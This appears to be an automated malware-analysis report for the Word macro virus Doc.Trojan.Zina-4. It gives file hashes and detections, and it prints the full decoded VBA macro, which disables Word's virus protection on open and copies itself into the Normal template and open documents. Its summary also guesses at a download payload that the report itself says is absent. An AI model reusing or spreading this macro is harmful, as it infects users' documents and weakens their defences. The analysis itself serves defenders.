Doc.Trojan.Zina-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 6db1019b8c80cbd0…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f4ccea01ab4ee9860cafbddeed86bf99
SHA-1: 970d4eacaa98f5c6ff3b84d80b57e5ed127295c6
SHA-256: 6db1019b8c80cbd013f2e9c293b3ffbebe990b5f7cedd51f9907529faceb3eb1
Risk Score: 120

Malware Insights

Doc.Trojan.Zina-4 · confidence 95%

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

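The sample contains a critical ClamAV detection for 'Doc.Trojan.Zina-4' and a high-severity heuristic for a Document_Open macro. The VBA macro code appears to be designed to execute upon opening the document, likely to download and execute a secondary payload. In the extracted source, Document_Open sets Options.VirusProtection to 0 and copies the macro's own code into the Normal template and the active document when their first line is not the 'String2K marker; no download call appears in it. The presence of the Document_Open macro and the specific ClamAV signature strongly indicate a malicious document.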

Heuristics 3

  • ClamAV: Doc.Trojan.Zina-4 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Zina-4
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1317 bytes
SHA-256: 1888dc515143524b2d1649d4f04230cadef906a5f19b19bf50c7176e10ae3b8a
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'String2K
Dim a23489245, b23489234, c76394729, d39848275, e72945601, f92038476
Dim g50385723, h84729645, i84729645, j40395423, k02391836, l20654583, m29387656
Dim n74359023, o09324687, p98734985, r90809564
Private Sub Document_Open()
Set a23489245 = Application.ActiveDocument: Set b23489234 = Application.NormalTemplate
Set c76394729 = ThisDocument: d39848275 = 1: Options.VirusProtection = (d39848275 - d39848275)
Set k02391836 = b23489234.VBProject.vbcomponents(d39848275).CodeModule
Set n74359023 = a23489245.VBProject.vbcomponents(d39848275).CodeModule
e72945601 = c76394729.VBProject.vbcomponents(d39848275).CodeModule.Lines(d39848275, _
c76394729.VBProject.vbcomponents(d39848275).CodeModule.countoflines)
If k02391836.Lines(d39848275, d39848275) <> "'String2K" Then
k02391836.deletelines d39848275, k02391836.countoflines
k02391836.addfromstring e72945601
End If
If n74359023.Lines(d39848275, d39848275) <> "'String2K" Then
n74359023.deletelines d39848275, n74359023.countoflines
n74359023.addfromstring e72945601
End If
End Sub